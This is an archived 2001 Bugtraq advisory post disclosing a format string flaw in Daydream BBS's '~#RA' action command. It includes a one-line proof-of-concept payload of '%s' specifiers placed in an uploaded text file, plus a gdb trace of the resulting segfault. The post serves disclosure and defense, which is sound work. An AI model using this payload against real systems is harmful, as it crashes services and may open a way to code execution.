[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Daydream BBS Format strings issue.
From:       KF <dotslash () snosoft ! com>
Date:       2001-12-31 0:14:31
[Download RAW message or body]

Daydream BBS recently underwent some security changes.Although the 
buffer overflow
was fixed in the ~#RA command I am not sure if a format strings issue  
was addressed Its my 
understanding that the users of daydream have the option of adding 
"Action commands"
("~#RA being one of them")into the text files that they post. If a user 
forms a specialy crafted
text file uploads to daydream and then views the message using the menu 
system the issue
could be exploited.


background info:

 ~#RA[FILE]|[max]|
        Show random textfile. Format for file is "/path/foobar%d.ext",
where %d is a random
        number (1-[max]).

example:

echo "~#RA%s%s%s%s%s%s" > filetoupload.gfx. Then place this file on the server and \
view it via the menu system.


Simple test to proove existance:
[root@linuxppc <mailto:root@linuxppc> bbs]# echo "~#RA%s%s%s%s%s%s" > \
display/iso/welcome.gfx



                   ·| All accounts deleted - login |·

                   :|           as NEW!            |:

                  .:|                              |:.

           . ....:::|      NEW / CHAT / LOGOFF     |:::.... .

                    `------------------------------'


Username: test

Password: ****

Program received signal SIGSEGV, Segmentation fault.

formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n",

  flags=268615586) at typetext.c:594

594                                     *cm++ = *sr++;

(gdb) bt

#0  formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n",

  flags=268615586) at typetext.c:594


(gdb) x/10s $r1

0x7fffd440:      "\177ÿÚ\220\020\001Öì%s%s%s%s%s%s\n"



-KF


[prev in list] [next in list] [prev in thread] [next in thread]